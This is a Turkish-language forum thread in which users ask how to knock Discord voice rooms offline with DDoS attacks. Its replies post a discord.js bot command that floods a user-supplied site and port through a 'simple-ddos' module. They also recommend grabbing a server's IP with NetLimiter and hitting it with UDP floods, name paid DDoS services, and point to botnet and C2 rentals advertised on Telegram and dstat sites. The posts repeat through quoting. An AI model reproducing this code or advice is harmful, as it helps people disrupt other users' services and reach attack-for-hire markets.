Discord sesli odalara DDOS nasıl atılır?

Fluffy

Diamond Üye
Dark paradise gibi sunucularda seslere DDOS atıyorlar sesin hat bağlantısı kopuyor herkes başka odaya geçmek zorunda kalıyor. Bu odalara vurma muhabbeti nasıl yapılıyor?

Bazı siteler veya c sharp kodları var onlarla yapılıyo da bende pek bilmiyo amaa ornek 1992.920.2311 < odanın hat sunucu ip si bu ip ye belirli kodlarla yaparsın diye düşünüyorum

DÜZENLEME: kanka item satış da bi ddos atma yeri buldum ama paralı güvenilir değil istersen atarım link ddos atma ücreti 20 tl miş

düzenleme kod buldum

Discord DDOS Atma Komutu

Açıklama;
Belirttiğiniz siteye ddos atar!
Atılacağı Yer;
komutlar/ddos-at.js
Eklenilcek Modüller;
simple-ddos

Kod:
const Discord = require ("discord.js");
const ddos = require ("simple-ddos");

exports.run = (client, message, args) => {
/* Emojiler Burada İdi */
let başarılı = client.emojis.get("649321643704975384");
let yükleniyor = client.emojis.get("649322537804890132");
let başarısız = client.emojis.get("650954036387905536");
/* Argslar */
var site = args.slice(0).join(" ");
var port = args.slice(1).join(" ");
/* Hatalar&Yardım Menü */
if (!site) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** `);
if (!port) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** ` );
/* İşlev */
message.channel.send( ` ${yükleniyor} **Saldırı İçin Botnetler Hazırlanıyor...**`).then ;
message.channel.send( ` ${başarılı} **Saldırı Başlatıldı**` )
ddos(30,`${site}`, 200, 1000 )
};
exports.conf = {
enabled: true,
aliases: [],
permLevel: 0
};

exports.help = {
name: 'ddos',
description: 'İstediğiniz Siteye DDoS Saldırısı Yapar',
usage: '!ddos <Site w/Http(s)> <port>'
};

NetLimitter'dan alıcaksın aypiyi çakıcaksın UDPMİX bak bakıyım allahuteala hazretlerinin huzuruna gitmiyormu o sunucu.
kanka kodlama bilgim hic yok kolay yoldan halledebilecegimiz bi yol yok mu veya nasıl ogrenirim

burdan hangisini alacağım?

birde ddos toolu ile vurmamız mümkün mü?
66. ile başlayanlar, birde ddos tool ile vuramazsın discord methodu olan botnet veya c2 kullanman gerek, özel payload kullanılıyor, Amerika lokasyon ses sunucuları methodla bile düşmüyorlar ama

Bazı siteler veya c sharp kodları var onlarla yapılıyo da bende pek bilmiyo amaa ornek 1992.920.2311 < odanın hat sunucu ip si bu ip ye belirli kodlarla yaparsın diye düşünüyorum

DÜZENLEME: kanka item satış da bi ddos atma yeri buldum ama paralı güvenilir değil istersen atarım link ddos atma ücreti 20 tl miş

düzenleme kod buldum

Discord DDOS Atma Komutu

Açıklama;
Belirttiğiniz siteye ddos atar!
Atılacağı Yer;
komutlar/ddos-at.js
Eklenilcek Modüller;
simple-ddos

Kod:
const Discord = require ("discord.js");
const ddos = require ("simple-ddos");

exports.run = (client, message, args) => {
/* Emojiler Burada İdi */
let başarılı = client.emojis.get("649321643704975384");
let yükleniyor = client.emojis.get("649322537804890132");
let başarısız = client.emojis.get("650954036387905536");
/* Argslar */
var site = args.slice(0).join(" ");
var port = args.slice(1).join(" ");
/* Hatalar&Yardım Menü */
if (!site) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** `);
if (!port) return message.channel.send( ` ${başarısız} **Yanlış Kullanım! Doğrusu;\n!ddos <Site> <Port>** ` );
/* İşlev */
message.channel.send( ` ${yükleniyor} **Saldırı İçin Botnetler Hazırlanıyor...**`).then ;
message.channel.send( ` ${başarılı} **Saldırı Başlatıldı**` )
ddos(30,`${site}`, 200, 1000 )
};
exports.conf = {
enabled: true,
aliases: [],
permLevel: 0
};

exports.help = {
name: 'ddos',
description: 'İstediğiniz Siteye DDoS Saldırısı Yapar',
usage: '!ddos <Site w/Http(s)> <port>'
};

NetLimitter'dan alıcaksın aypiyi çakıcaksın UDPMİX bak bakıyım allahuteala hazretlerinin huzuruna gitmiyormu o sunucu.
hiçbirşey yapmaz bu :D

66. ile başlayanlar, birde ddos tool ile vuramazsın discord methodu olan botnet veya c2 kullanman gerek, özel payload kullanılıyor, Amerika lokasyon ses sunucuları methodla bile düşmüyorlar ama

hiçbirşey yapmaz bu :D
bu methodlu botnet veya c2 dediğiniz şeyi nerden bulabilirim? satılıyor mu veya bildiğin bir yer var mı?

bu methodlu botnet veya c2 dediğiniz şeyi nerden bulabilirim? satılıyor mu veya bildiğin bir yer var mı?
buradan paylaşmam uygun olmaz, telegramda botnet ve C2 servisleri aratarak veya googlede dstat sitelerinde reklamlar veriliyor C2 sıralaması oluyor onlara bakabilirsin

Şuanda konuyu görüntüleyen kullanıcılar

Üst Alt